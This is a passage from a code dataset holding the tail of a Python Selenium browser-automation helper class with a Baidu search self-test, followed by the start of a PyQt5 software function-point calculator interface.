WebDriverWait(self.driver,timeout,1).until(EC.title_is(title))\r\n return result\r\n\r\n def is_title_contains(self,str,timeout=10):\r\n # 判断title包含于driver.title\r\n result = WebDriverWait(self.driver,timeout,1).until(EC.title_contains(str))\r\n return result\r\n\r\n def is_selected(self,locator,timeout=10):\r\n #判断元素是否被选中,返回布尔值\r\n result = WebDriverWait(self.driver,timeout,1).until(EC.element_located_to_be_selected(locator))\r\n return result\r\n\r\n def is_selected_be(self,locator,selected=True,timeout=10):\r\n #判断元素的状态,selected的期望值:True/False, 返回布尔值\r\n result = WebDriverWait(self.driver,timeout,1).until(EC.element_located_selection_state_to_be(locator,selected))\r\n return result\r\n\r\n def is_alert_present(self,timeout=10):\r\n #判断页面是否有alert, 有就返回alert, 没有就返回False\r\n result = WebDriverWait(self.driver,timeout,1).until(EC.alert_is_present())\r\n return result\r\n\r\n def is_visibility(self, locator, timeout=10):\r\n '''元素可见返回本身,不可见返回Fasle'''\r\n result = WebDriverWait(self.driver, timeout,1).until(EC.visibility_of_element_located(locator))\r\n return result\r\n\r\n def is_invisibility(self, locator, timeout=10):\r\n '''元素可见返回本身,不可见返回True,没找到元素也返回True'''\r\n result = WebDriverWait(self.driver, timeout, 1).until(EC.invisibility_of_element_located(locator))\r\n return result\r\n\r\n def is_clickable(self, locator, timeout=10):\r\n '''元素可以点击is_enabled返回本身,不可点击返回Fasle'''\r\n result = WebDriverWait(self.driver, timeout, 1).until(EC.element_to_be_clickable(locator))\r\n return result\r\n\r\n def is_located(self, locator, timeout=10):\r\n '''判断元素有没被定位到(并不意味着可见),定位到返回element,没定位到返回False'''\r\n result = WebDriverWait(self.driver, timeout, 1).until(EC.presence_of_element_located(locator))\r\n return result\r\n\r\n def move_to_element(self,locator):\r\n #鼠标悬停操作\r\n element = self.find_element(locator)\r\n ActionChains(self.driver).move_to_element(element).perform()\r\n\r\n def back(self):\r\n #浏览器页面回退\r\n self.driver.back()\r\n\r\n def forward(self):\r\n #浏览器前进\r\n self.driver.forward()\r\n\r\n def close(self):\r\n \"\"\"\r\n Simulates the user clicking the \"close\" button in the titlebar of a popup\r\n window or tab.\r\n\r\n Usage:\r\n driver.close()\r\n \"\"\"\r\n t1 = time.time()\r\n self.driver.close()\r\n self.my_print(\"{0} Closed current window, Spend {1} seconds\".format(success, time.time() - t1))\r\n\r\n def quit(self):\r\n \"\"\"\r\n Quit the driver and close all the windows.\r\n\r\n Usage:\r\n driver.quit()\r\n \"\"\"\r\n t1 = time.time()\r\n self.driver.quit()\r\n self.my_print(\"{0} Closed all window and quit the driver, Spend {1} seconds\".format(success, time.time() - t1))\r\n\r\n def get_title(self):\r\n #获取driver.title\r\n t1 = time.time()\r\n title = self.driver.title\r\n self.my_print(\"{0} Get current window title, Spend {1} seconds\".format(success, time.time() - t1))\r\n return title\r\n\r\n def get_text(self,locator):\r\n \"\"\"\r\n Get element text information.\r\n\r\n Usage:\r\n driver.get_text((\"id\",\"kw\"))\r\n \"\"\"\r\n t1 = time.time()\r\n try:\r\n element = self.find_element(locator)\r\n text = element.text\r\n self.my_print(\r\n \"{0} Get element text element: <{1}>, Spend {2} seconds\".format(success, locator, time.time() - t1))\r\n return text\r\n except Exception:\r\n self.my_print(\r\n \"{0} Unable to get element text element: <{1}>, Spend {2} seconds\".format(fail, locator, time.time() - t1))\r\n raise\r\n\r\n def get_url(self):\r\n '''\r\n Get the URL address of the current page.\r\n\r\n Usage:\r\n driver.get_url()\r\n '''\r\n t1 = time.time()\r\n url = self.driver.current_url\r\n self.my_print(\"{0} Get current window url, Spend {1} seconds\".format(success, time.time() - t1))\r\n return url\r\n\r\n def wait(self, secs):\r\n \"\"\"\r\n Implicitly wait.All elements on the page.\r\n\r\n Usage:\r\n driver.wait(10)\r\n \"\"\"\r\n t1 = time.time()\r\n self.driver.implicitly_wait(secs)\r\n self.my_print(\"{0} Set wait all element display in {1} seconds, Spend {2} seconds\".format(success,\r\n secs,time.time() - t1))\r\n\r\n def get_screenshot(self, file_path):\r\n '''\r\n Get the current window screenshot.\r\n\r\n Usage:\r\n driver.get_screenshot('/Screenshots/foo.jpg')\r\n driver.get_screenshot('/Screenshots/foo.png')\r\n '''\r\n t1 = time.time()\r\n try:\r\n self.driver.get_screenshot_as_file(file_path)\r\n self.my_print(\"{0} Get the current window screenshot,path: {1}, Spend {2} seconds\".format(success,\r\n file_path,\r\n time.time() - t1))\r\n except Exception:\r\n self.my_print(\"{0} Unable to get the current window screenshot,path: {1}, Spend {2} seconds\".format(fail,\r\n file_path,\r\n time.time() - t1))\r\n raise\r\n\r\n # def get_screenshot_as_base64(self):\r\n # self.driver.get_screenshot_as_base64()\r\n\r\n def get_attribute(self, locator, name):\r\n '''获取属性'''\r\n t1 = time.time()\r\n try:\r\n el = self.find_element(locator)\r\n attribute = el.get_attribute(name)\r\n self.my_print(\"{0} Get attribute element: <{1}>,attribute: {2}, Spend {3} seconds\".format(success,\r\n locator, attribute,\r\n time.time() - t1))\r\n return attribute\r\n except Exception:\r\n self.my_print(\"{0} Unable to get attribute element: <{1}>,attribute: {2}, Spend {3} seconds\".format(fail,\r\n locator,\r\n attribute,\r\n time.time() - t1))\r\n raise\r\n\r\n def accept_alert(self):\r\n '''\r\n Accept warning box.\r\n\r\n Usage:\r\n driver.accept_alert()\r\n '''\r\n t1 = time.time()\r\n self.driver.switch_to.alert.accept()\r\n self.my_print(\"{0} Accept warning box, Spend {1} seconds\".format(success, time.time() - t1))\r\n\r\n def dismiss_alert(self):\r\n '''\r\n Dismisses the alert available.\r\n\r\n Usage:\r\n driver.dismiss_alert()\r\n '''\r\n t1 = time.time()\r\n self.driver.switch_to.alert.dismiss()\r\n self.my_print(\"{0} Dismisses the alert available, Spend {1} seconds\".format(success, time.time() - t1))\r\n\r\n def switch_to_frame(self, locator):\r\n '''\r\n Switch to the specified frame.\r\n\r\n Usage:\r\n driver.switch_to_frame((\"id\",\"kw\"))\r\n '''\r\n t1 = time.time()\r\n try:\r\n iframe_el = self.find_element(locator)\r\n self.driver.switch_to.frame(iframe_el)\r\n self.my_print(\r\n \"{0} Switch to frame element: <{1}>, Spend {2} seconds\".format(success, locator, time.time() - t1))\r\n except Exception:\r\n self.my_print(\r\n \"{0} Unable switch to frame element: <{1}>, Spend {2} seconds\".format(fail, locator, time.time() - t1))\r\n raise\r\n\r\n def switch_to_frame_out(self):\r\n '''\r\n Returns the current form machine form at the next higher level.\r\n Corresponding relationship with switch_to_frame () method.\r\n\r\n Usage:\r\n driver.switch_to_frame_out()\r\n '''\r\n t1 = time.time()\r\n self.driver.switch_to.default_content()\r\n self.my_print(\"{0} Switch to frame out, Spend {1} seconds\".format(success, time.time() - t1))\r\n\r\n\r\n def open_new_window(self, locator):\r\n '''\r\n Open the new window and switch the handle to the newly opened window.\r\n\r\n Usage:\r\n driver.open_new_window()\r\n '''\r\n t1 = time.time()\r\n try:\r\n original_windows = self.driver.current_window_handle\r\n el = self.find_element(locator)\r\n el.click()\r\n all_handles = self.driver.window_handles\r\n for handle in all_handles:\r\n if handle != original_windows:\r\n self.driver.switch_to.window(handle)\r\n self.my_print(\"{0} Click element: <{1}> open a new window and swich into, Spend {2} seconds\".format(success,\r\n locator,\r\n time.time() - t1))\r\n except Exception:\r\n self.my_print(\"{0} Click element: <{1}> open a new window and swich into, Spend {2} seconds\".format(fail,\r\n locator,\r\n time.time() - t1))\r\n raise\r\n\r\n def into_new_window(self):\r\n \"\"\"\r\n Into the new window.\r\n\r\n Usage:\r\n dirver.into_new_window()\r\n \"\"\"\r\n t1 = time.time()\r\n try:\r\n all_handle = self.driver.window_handles\r\n flag = 0\r\n while len(all_handle) < 2:\r\n time.sleep(1)\r\n all_handle = self.driver.window_handles\r\n flag += 1\r\n if flag == 5:\r\n break\r\n self.driver.switch_to.window(all_handle[-1])\r\n self.my_print(\"{0} Switch to the new window,new window's url: {1}, Spend {2} seconds\".format(success,\r\n self.driver.current_url,time.time() - t1))\r\n except Exception:\r\n self.my_print(\"{0} Unable switch to the new window, Spend {1} seconds\".format(fail, time.time() - t1))\r\n raise\r\n\r\n def js_execute(self, js):\r\n '''执行js'''\r\n t1 = time.time()\r\n try:\r\n self.driver.execute_script(js)\r\n self.my_print(\r\n \"{0} Execute javascript scripts: {1}, Spend {2} seconds\".format(success, js, time.time() - t1))\r\n except Exception:\r\n self.my_print(\"{0} Unable to execute javascript scripts: {1}, Spend {2} seconds\".format(fail,\r\n js,\r\n time.time() - t1))\r\n raise\r\n\r\n def js_focus_element(self, locator):\r\n '''聚焦元素'''\r\n target = self.find_element(locator)\r\n self.driver.execute_script(\"arguments[0].scrollIntoView();\", target)\r\n\r\n def js_scroll_top(self):\r\n '''滚动到顶部'''\r\n js = \"window.scrollTo(0,0)\"\r\n self.driver.execute_script(js)\r\n\r\n def js_scroll_end(self):\r\n '''滚动到底部'''\r\n js = \"window.scrollTo(0,document.body.scrollHeight)\"\r\n self.driver.execute_script(js)\r\n\r\n def js_click(self, css):\r\n \"\"\"\r\n Input a css selecter,use javascript click element.\r\n Usage:\r\n driver.js_click('#buttonid')\r\n \"\"\"\r\n t1 = time.time()\r\n js_str = \"$('{0}').click()\".format(css)\r\n try:\r\n self.driver.execute_script(js_str)\r\n self.my_print(\"{0} Use javascript click element: {1}, Spend {2} seconds\".format(success,js_str,time.time()-t1))\r\n except Exception:\r\n self.my_print(\"{0} Unable to use javascript click element: {1}, Spend {2} seconds\".format(fail,\r\n js_str, time.time() - t1))\r\n raise\r\n\r\n # def js_input_value(self, css, str):\r\n # \"\"\"\r\n # Input a css selecter,str,use javascript to set input.value.\r\n #\r\n # Usage:\r\n # driver.js_input_value('#buttonid',str)\r\n # \"\"\"\r\n # t1 = time.time()\r\n # js_str = \"document.getElementById('{0}').value='{2}')\".format(css,str)\r\n # try:\r\n # self.driver.execute_script(js_str)\r\n # self.my_print(\"{0} Use javascript set input.value : {1}, Spend {2} seconds\".format(success,js_str,time.time()-t1))\r\n # except Exception:\r\n # self.my_print(\"{0} Unable to use javascript set input.value: {1}, Spend {2} seconds\".format(fail,\r\n # js_str, time.time() - t1))\r\n # raise\r\n\r\n def select_by_index(self, locator, index):\r\n '''通过索引,index是索引第几个,从0开始'''\r\n element = self.find_element(locator)\r\n Select(element).select_by_index(index)\r\n\r\n def select_by_value(self, locator, value):\r\n '''通过value属性'''\r\n element = self.find_element(locator)\r\n Select(element).select_by_value(value)\r\n\r\n def select_by_text(self, locator, text):\r\n '''通过文本值定位'''\r\n element = self.find_element(locator)\r\n Select(element).select_by_value(text)\r\n\r\nif __name__ == '__main__':\r\n # if下面的代码都是测试调试的代码,自测内容\r\n # driver = browser()\r\n # 返回类的实例:打开浏览器\r\n driver_n = Wang(Browser())\r\n # 返回类的实例:打开浏览器\r\n driver_n.open(\"http://www.baidu.com\") # 打开url,顺便判断打开的页面对不对\r\n #获取页面title\r\n input_loc = (\"id\", \"kw\")\r\n print(driver_n.get_title())\r\n #输入yoyo\r\n el = driver_n.find_element(input_loc)\r\n driver_n.send_keys(input_loc, \"yoyo\")\r\n time.sleep(2)\r\n #清空搜索栏,重新输入“美女图片”,点击搜索\r\n driver_n.clear_send_keys(input_loc,\"美女图片\")\r\n driver_n.click((\"id\",\"su\"))\r\n # print (driver_n.is_text_in_element((\"name\", \"tj_trmap\"), \"地图\"))\r\n #鼠标悬停在设置按钮上\r\n set_loc = (\"link text\",\"设置\")\r\n driver_n.move_to_element(set_loc)\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"wanghaihong200/Wang-selenium","sub_path":"Wang-selenium/case/happy_public/wang_selenium.py","file_name":"wang_selenium.py","file_ext":"py","file_size_in_byte":31186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7806940679","text":"from PyQt5 import QtCore, QtGui, QtWidgets\nimport SE_VAF, SE_select_language\nfrom decimal import Decimal\n\n\nclass Ui_Form(object):\n counter = 0\n\n def __init__(self, saved_dict):\n self.displaylang_result = 0\n self.lang = \"None\"\n self.totalcount = 0\n self.vaf_value = 0\n self.fp = 0\n self.new_dict = saved_dict\n # print(\"Printing saved dict: {}\".format(saved_dict))\n Ui_Form.counter += 1\n\n def setupUi(self, Form, fpname):\n Form.setObjectName(\"Form\")\n Form.resize(717, 603)\n self.label_12 = QtWidgets.QLabel(Form)\n self.label_12.setGeometry(QtCore.QRect(450, 60, 51, 16))\n font = QtGui.QFont()\n font.setPointSize(10)\n self.label_12.setFont(font)\n self.label_12.setObjectName(\"label_12\")\n self.ILF_Label_2 = QtWidgets.QLabel(Form)\n self.ILF_Label_2.setGeometry(QtCore.QRect(580, 250, 71, 16))\n font = QtGui.QFont()\n font.setPointSize(12)\n self.ILF_Label_2.setFont(font)\n self.ILF_Label_2.setObjectName(\"ILF_Label_2\")\n self.label_13 = QtWidgets.QLabel(Form)\n self.label_13.setGeometry(QtCore.QRect(350, 60, 51, 16))\n font = QtGui.QFont()\n font.setPointSize(10)\n self.label_13.setFont(font)\n self.label_13.setObjectName(\"label_13\")\n self.horizontalLayoutWidget_6 = QtWidgets.QWidget(Form)\n self.horizontalLayoutWidget_6.setGeometry(QtCore.QRect(10, 140, 521, 31))\n self.horizontalLayoutWidget_6.setObjectName(\"horizontalLayoutWidget_6\")\n self.horizontalLayout_6 = QtWidgets.QHBoxLayout(self.horizontalLayoutWidget_6)\n self.horizontalLayout_6.setContentsMargins(0, 0, 0, 0)\n self.horizontalLayout_6.setObjectName(\"horizontalLayout_6\")\n self.label_14 = QtWidgets.QLabel(self.horizontalLayoutWidget_6)\n self.label_14.setObjectName(\"label_14\")\n self.horizontalLayout_6.addWidget(self.label_14)\n self.EO_lineedit_2 = QtWidgets.QLineEdit(self.horizontalLayoutWidget_6)\n self.EO_lineedit_2.setMinimumSize(QtCore.QSize(100, 0))\n self.EO_lineedit_2.setMaximumSize(QtCore.QSize(50, 16777215))\n self.EO_lineedit_2.setObjectName(\"EO_lineedit_2\")\n self.horizontalLayout_6.addWidget(self.EO_lineedit_2)\n self.radioButton_16 = QtWidgets.QRadioButton(self.horizontalLayoutWidget_6)\n self.radioButton_16.setObjectName(\"radioButton_16\")\n self.horizontalLayout_6.addWidget(self.radioButton_16)\n self.radioButton_17 = QtWidgets.QRadioButton(self.horizontalLayoutWidget_6)\n self.radioButton_17.setObjectName(\"radioButton_17\")\n self.horizontalLayout_6.addWidget(self.radioButton_17)\n self.radioButton_18 = QtWidgets.QRadioButton(self.horizontalLayoutWidget_6)\n self.radioButton_18.setObjectName(\"radioButton_18\")\n self.horizontalLayout_6.addWidget(self.radioButton_18)\n self.FP_Label_2 = QtWidgets.QLabel(Form)\n self.FP_Label_2.setGeometry(QtCore.QRect(580, 400, 71, 16))\n font = QtGui.QFont()\n font.setPointSize(12)\n self.FP_Label_2.setFont(font)\n self.FP_Label_2.setObjectName(\"FP_Label_2\")\n self.label_15 = QtWidgets.QLabel(Form)\n self.label_15.setGeometry(QtCore.QRect(300, 10, 151, 31))\n font = QtGui.QFont()\n font.setPointSize(12)\n font.setBold(True)\n font.setWeight(75)\n self.label_15.setFont(font)\n self.label_15.setObjectName(\"label_15\")\n self.EO_Label_2 = QtWidgets.QLabel(Form)\n self.EO_Label_2.setGeometry(QtCore.QRect(580, 150, 71, 16))\n font = QtGui.QFont()\n font.setPointSize(12)\n self.EO_Label_2.setFont(font)\n self.EO_Label_2.setObjectName(\"EO_Label_2\")\n self.EI_Label_2 = QtWidgets.QLabel(Form)\n self.EI_Label_2.setGeometry(QtCore.QRect(580, 100, 71, 16))\n font = QtGui.QFont()\n font.setPointSize(12)\n self.EI_Label_2.setFont(font)\n self.EI_Label_2.setObjectName(\"EI_Label_2\")\n self.Error_Label = QtWidgets.QLabel(Form)\n self.Error_Label.setGeometry(QtCore.QRect(200, 340, 371, 31))\n self.Error_Label.setFont(font)\n self.Error_Label.setObjectName(\"Error_Label\")\n self.Error_Label.setText(\"\")\n self.horizontalLayoutWidget_7 = QtWidgets.QWidget(Form)\n self.horizontalLayoutWidget_7.setGeometry(QtCore.QRect(10, 240, 521, 31))\n self.horizontalLayoutWidget_7.setObjectName(\"horizontalLayoutWidget_7\")\n self.horizontalLayout_7 = QtWidgets.QHBoxLayout(self.horizontalLayoutWidget_7)\n self.horizontalLayout_7.setContentsMargins(0, 0, 0, 0)\n self.horizontalLayout_7.setObjectName(\"horizontalLayout_7\")\n self.label_16 = QtWidgets.QLabel(self.horizontalLayoutWidget_7)\n self.label_16.setObjectName(\"label_16\")\n self.horizontalLayout_7.addWidget(self.label_16)\n self.ILF_lineedit_2 = QtWidgets.QLineEdit(self.horizontalLayoutWidget_7)\n self.ILF_lineedit_2.setMinimumSize(QtCore.QSize(100, 0))\n self.ILF_lineedit_2.setMaximumSize(QtCore.QSize(50, 16777215))\n self.ILF_lineedit_2.setObjectName(\"ILF_lineedit_2\")\n self.horizontalLayout_7.addWidget(self.ILF_lineedit_2)\n self.radioButton_19 = QtWidgets.QRadioButton(self.horizontalLayoutWidget_7)\n self.radioButton_19.setObjectName(\"radioButton_19\")\n self.horizontalLayout_7.addWidget(self.radioButton_19)\n self.radioButton_20 = QtWidgets.QRadioButton(self.horizontalLayoutWidget_7)\n self.radioButton_20.setObjectName(\"radioButton_20\")\n self.horizontalLayout_7.addWidget(self.radioButton_20)\n self.radioButton_21 = QtWidgets.QRadioButton(self.horizontalLayoutWidget_7)\n self.radioButton_21.setObjectName(\"radioButton_21\")\n self.horizontalLayout_7.addWidget(self.radioButton_21)\n self.TC_Label_2 = QtWidgets.QLabel(Form)\n self.TC_Label_2.setGeometry(QtCore.QRect(580, 340, 71, 16))\n font = QtGui.QFont()\n font.setPointSize(12)\n self.TC_Label_2.setFont(font)\n self.TC_Label_2.setObjectName(\"TC_Label_2\")\n self.horizontalLayoutWidget_8 = QtWidgets.QWidget(Form)\n self.horizontalLayoutWidget_8.setGeometry(QtCore.QRect(10, 190, 521, 31))\n self.horizontalLayoutWidget_8.setObjectName(\"horizontalLayoutWidget_8\")\n self.horizontalLayout_8 = QtWidgets.QHBoxLayout(self.horizontalLayoutWidget_8)\n self.horizontalLayout_8.setContentsMargins(0, 0, 0, 0)\n self.horizontalLayout_8.setObjectName(\"horizontalLayout_8\")\n self.label_17 = QtWidgets.QLabel(self.horizontalLayoutWidget_8)\n self.label_17.setObjectName(\"label_17\")\n self.horizontalLayout_8.addWidget(self.label_17)\n self.EInq_lineedit_2 = QtWidgets.QLineEdit(self.horizontalLayoutWidget_8)\n self.EInq_lineedit_2.setMinimumSize(QtCore.QSize(100, 0))\n self.EInq_lineedit_2.setMaximumSize(QtCore.QSize(50, 16777215))\n self.EInq_lineedit_2.setObjectName(\"EInq_lineedit_2\")\n self.horizontalLayout_8.addWidget(self.EInq_lineedit_2)\n self.radioButton_22 = QtWidgets.QRadioButton(self.horizontalLayoutWidget_8)\n self.radioButton_22.setObjectName(\"radioButton_22\")\n self.horizontalLayout_8.addWidget(self.radioButton_22)\n self.radioButton_23 = QtWidgets.QRadioButton(self.horizontalLayoutWidget_8)\n self.radioButton_23.setObjectName(\"radioButton_23\")\n self.horizontalLayout_8.addWidget(self.radioButton_23)\n self.radioButton_24 = QtWidgets.QRadioButton(self.horizontalLayoutWidget_8)\n self.radioButton_24.setObjectName(\"radioButton_24\")\n self.horizontalLayout_8.addWidget(self.radioButton_24)\n self.Language_Label_2 = QtWidgets.QLabel(Form)\n self.Language_Label_2.setGeometry(QtCore.QRect(440, 500, 71, 16))\n font = QtGui.QFont()\n font.setPointSize(10)\n self.Language_Label_2.setFont(font)\n self.Language_Label_2.setObjectName(\"Language_Label_2\")\n self.horizontalLayoutWidget_9 = QtWidgets.QWidget(Form)\n self.horizontalLayoutWidget_9.setGeometry(QtCore.QRect(10, 290, 521, 31))\n self.horizontalLayoutWidget_9.setObjectName(\"horizontalLayoutWidget_9\")\n self.horizontalLayout_9 = QtWidgets.QHBoxLayout(self.horizontalLayoutWidget_9)\n self.horizontalLayout_9.setContentsMargins(0, 0, 0, 0)\n self.horizontalLayout_9.setObjectName(\"horizontalLayout_9\")\n self.label_18 = QtWidgets.QLabel(self.horizontalLayoutWidget_9)\n self.label_18.setObjectName(\"label_18\")\n self.horizontalLayout_9.addWidget(self.label_18)\n self.EIF_lineedit_2 = QtWidgets.QLineEdit(self.horizontalLayoutWidget_9)\n self.EIF_lineedit_2.setMinimumSize(QtCore.QSize(100, 0))\n self.EIF_lineedit_2.setMaximumSize(QtCore.QSize(50, 16777215))\n self.EIF_lineedit_2.setObjectName(\"EIF_lineedit_2\")\n self.horizontalLayout_9.addWidget(self.EIF_lineedit_2)\n self.radioButton_25 = QtWidgets.QRadioButton(self.horizontalLayoutWidget_9)\n self.radioButton_25.setObjectName(\"radioButton_25\")\n self.horizontalLayout_9.addWidget(self.radioButton_25)\n self.radioButton_26 = QtWidgets.QRadioButton(self.horizontalLayoutWidget_9)\n self.radioButton_26.setObjectName(\"radioButton_26\")\n self.horizontalLayout_9.addWidget(self.radioButton_26)\n self.radioButton_27 = QtWidgets.QRadioButton(self.horizontalLayoutWidget_9)\n self.radioButton_27.setObjectName(\"radioButton_27\")\n self.horizontalLayout_9.addWidget(self.radioButton_27)\n self.verticalLayoutWidget_2 = QtWidgets.QWidget(Form)\n self.verticalLayoutWidget_2.setGeometry(QtCore.QRect(10, 380, 201, 201))\n self.verticalLayoutWidget_2.setObjectName(\"verticalLayoutWidget_2\")\n self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.verticalLayoutWidget_2)\n self.verticalLayout_2.setContentsMargins(0, 0, 0, 0)\n self.verticalLayout_2.setObjectName(\"verticalLayout_2\")\n self.computefp_btn_2 = QtWidgets.QPushButton(self.verticalLayoutWidget_2)\n self.computefp_btn_2.setObjectName(\"computefp_btn_2\")\n self.verticalLayout_2.addWidget(self.computefp_btn_2)\n self.vaf_btn_2 = QtWidgets.QPushButton(self.verticalLayoutWidget_2)\n self.vaf_btn_2.setObjectName(\"vaf_btn_2\")\n self.verticalLayout_2.addWidget(self.vaf_btn_2)\n self.codesize_btn_2 = QtWidgets.QPushButton(self.verticalLayoutWidget_2)\n self.codesize_btn_2.setObjectName(\"codesize_btn_2\")\n self.verticalLayout_2.addWidget(self.codesize_btn_2)\n self.chooselang_btn_2 = QtWidgets.QPushButton(self.verticalLayoutWidget_2)\n self.chooselang_btn_2.setObjectName(\"chooselang_btn_2\")\n self.verticalLayout_2.addWidget(self.chooselang_btn_2)\n self.CodeSize_Label_2 = QtWidgets.QLabel(Form)\n self.CodeSize_Label_2.setGeometry(QtCore.QRect(580, 490, 71, 16))\n font = QtGui.QFont()\n font.setPointSize(12)\n self.CodeSize_Label_2.setFont(font)\n self.CodeSize_Label_2.setObjectName(\"CodeSize_Label_2\")\n self.label_19 = QtWidgets.QLabel(Form)\n self.label_19.setGeometry(QtCore.QRect(310, 490, 121, 31))\n font = QtGui.QFont()\n font.setPointSize(10)\n font.setBold(True)\n font.setWeight(75)\n self.label_19.setFont(font)\n self.label_19.setObjectName(\"label_19\")\n self.label_20 = QtWidgets.QLabel(Form)\n self.label_20.setGeometry(QtCore.QRect(20, 340, 81, 25))\n font = QtGui.QFont()\n font.setPointSize(10)\n font.setBold(True)\n font.setWeight(75)\n self.label_20.setFont(font)\n self.label_20.setObjectName(\"label_20\")\n self.VAF_Label_2 = QtWidgets.QLabel(Form)\n self.VAF_Label_2.setGeometry(QtCore.QRect(580, 440, 71, 16))\n font = QtGui.QFont()\n font.setPointSize(12)\n self.VAF_Label_2.setFont(font)\n self.VAF_Label_2.setObjectName(\"VAF_Label_2\")\n self.horizontalLayoutWidget_10 = QtWidgets.QWidget(Form)\n self.horizontalLayoutWidget_10.setGeometry(QtCore.QRect(10, 90, 521, 31))\n self.horizontalLayoutWidget_10.setObjectName(\"horizontalLayoutWidget_10\")\n self.horizontalLayout_10 = QtWidgets.QHBoxLayout(self.horizontalLayoutWidget_10)\n self.horizontalLayout_10.setContentsMargins(0, 0, 0, 0)\n self.horizontalLayout_10.setObjectName(\"horizontalLayout_10\")\n self.label_21 = QtWidgets.QLabel(self.horizontalLayoutWidget_10)\n self.label_21.setObjectName(\"label_21\")\n self.horizontalLayout_10.addWidget(self.label_21)\n self.EI_lineedit_2 = QtWidgets.QLineEdit(self.horizontalLayoutWidget_10)\n self.EI_lineedit_2.setMinimumSize(QtCore.QSize(100, 0))\n self.EI_lineedit_2.setMaximumSize(QtCore.QSize(50, 16777215))\n self.EI_lineedit_2.setObjectName(\"EI_lineedit_2\")\n self.horizontalLayout_10.addWidget(self.EI_lineedit_2)\n self.radioButton_28 = QtWidgets.QRadioButton(self.horizontalLayoutWidget_10)\n self.radioButton_28.setObjectName(\"radioButton_28\")\n self.horizontalLayout_10.addWidget(self.radioButton_28)\n self.radioButton_29 = QtWidgets.QRadioButton(self.horizontalLayoutWidget_10)\n self.radioButton_29.setObjectName(\"radioButton_29\")\n self.horizontalLayout_10.addWidget(self.radioButton_29)\n self.radioButton_30 = QtWidgets.QRadioButton(self.horizontalLayoutWidget_10)\n self.radioButton_30.setObjectName(\"radioButton_30\")\n self.horizontalLayout_10.addWidget(self.radioButton_30)\n self.EInq_Label_2 = QtWidgets.QLabel(Form)\n self.EInq_Label_2.setGeometry(QtCore.QRect(580, 200, 71, 16))\n font = QtGui.QFont()\n font.setPointSize(12)\n self.EInq_Label_2.setFont(font)\n self.EInq_Label_2.setObjectName(\"EInq_Label_2\")\n self.label_22 = QtWidgets.QLabel(Form)\n self.label_22.setGeometry(QtCore.QRect(240, 60, 47, 13))\n font = QtGui.QFont()\n font.setPointSize(10)\n self.label_22.setFont(font)\n self.label_22.setObjectName(\"label_22\")\n self.EIF_Label_2 = QtWidgets.QLabel(Form)\n self.EIF_Label_2.setGeometry(QtCore.QRect(580, 300, 71, 16))\n font = QtGui.QFont()\n font.setPointSize(12)\n self.EIF_Label_2.setFont(font)\n self.EIF_Label_2.setObjectName(\"EIF_Label_2\")\n\n # comment start\n self.chooselang_btn_2.clicked.connect(self.displaylang)\n self.vaf_btn_2.clicked.connect(self.vafdialog)\n self.computefp_btn_2.clicked.connect(self.calculatefp)\n self.EI_lineedit_2.setText(\"0\")\n self.EO_lineedit_2.setText(\"0\")\n self.EInq_lineedit_2.setText(\"0\")\n self.ILF_lineedit_2.setText(\"0\")\n self.EIF_lineedit_2.setText(\"0\")\n self.codesize_btn_2.clicked.connect(self.codesize)\n # comment end\n\n self.retranslateUi(Form)\n QtCore.QMetaObject.connectSlotsByName(Form)\n\n def calculatefp(self):\n self.choice = 0\n try:\n if int(self.EI_lineedit_2.text()) < 0 or int(self.EO_lineedit_2.text()) < 0 or int(\n self.EInq_lineedit_2.text()) < 0 or int(self.ILF_lineedit_2.text()) < 0 or int(\n self.EIF_lineedit_2.text()) < 0:\n self.Error_Label.setText(\"Enter positive numbers only!\")\n self.Error_Label.setStyleSheet(\"color: red\")\n return\n except:\n self.Error_Label.setText(\"Enter numbers only!\")\n self.Error_Label.setStyleSheet(\"color: red\")\n return\n\n self.Error_Label.setText(\"\")\n self.ei = int(self.EI_lineedit_2.text())\n if self.radioButton_28.isChecked():\n self.choice = 3\n elif self.radioButton_29.isChecked():\n self.choice = 4\n elif self.radioButton_30.isChecked():\n self.choice = 6\n self.result = self.ei * self.choice\n self.EI_Label_2.setText(str(self.result))\n\n self.eo = int(self.EO_lineedit_2.text())\n if self.radioButton_16.isChecked():\n self.choice = 4\n elif self.radioButton_17.isChecked():\n self.choice = 5\n elif self.radioButton_18.isChecked():\n self.choice = 7\n self.result = self.eo * self.choice\n self.EO_Label_2.setText(str(self.result))\n\n self.einq = int(self.EInq_lineedit_2.text())\n if self.radioButton_22.isChecked():\n self.choice = 3\n elif self.radioButton_23.isChecked():\n self.choice = 4\n elif self.radioButton_24.isChecked():\n self.choice = 6\n self.result = self.einq * self.choice\n self.EInq_Label_2.setText(str(self.result))\n\n self.ilf = int(self.ILF_lineedit_2.text())\n if self.radioButton_19.isChecked():\n self.choice = 7\n elif self.radioButton_20.isChecked():\n self.choice = 10\n elif self.radioButton_21.isChecked():\n self.choice = 15\n self.result = self.ilf * self.choice\n self.ILF_Label_2.setText(str(self.result))\n\n self.eif = int(self.EIF_lineedit_2.text())\n if self.radioButton_25.isChecked():\n self.choice = 5\n elif self.radioButton_26.isChecked():\n self.choice = 7\n elif self.radioButton_27.isChecked():\n self.choice = 10\n self.result = self.eif * self.choice\n self.EIF_Label_2.setText(str(self.result))\n\n # ********************\n self.totalcount = int(self.EI_Label_2.text()) + int(self.EO_Label_2.text()) + int(\n self.EInq_Label_2.text()) + int(self.ILF_Label_2.text()) + int(self.EIF_Label_2.text())\n self.TC_Label_2.setText(str(self.totalcount))\n self.vaf_value = int(self.VAF_Label_2.text())\n self.fp = self.totalcount * (Decimal('0.65') + (Decimal('0.01') * Decimal(self.vaf_value)))\n self.FP_Label_2.setText(str(int(self.fp)))\n # *********************\n\n def displaylang(self):\n self.Dialog_3 = QtWidgets.QDialog()\n self.codesizeobj = SE_select_language.Ui_Dialog()\n self.codesizeobj.setupUi(self.Dialog_3)\n self.Dialog_3.show()\n self.response = self.Dialog_3.exec_()\n\n if self.response == QtWidgets.QDialog.Accepted:\n self.displaylang_result, self.lang = self.codesizeobj.getvalue()\n\n def vafdialog(self):\n self.Dialog = QtWidgets.QDialog()\n self.vaf_obj = SE_VAF.Ui_Dialog()\n self.vaf_obj.setupUi(self.Dialog)\n self.Dialog.show()\n self.response = self.Dialog.exec_()\n\n if self.response == QtWidgets.QDialog.Accepted:\n self.VAF_Label_2.setText(str(self.vaf_obj.get_vaf_value()))\n\n def codesize(self):\n self.CodeSize_Label_2.setText(str(self.displaylang_result * 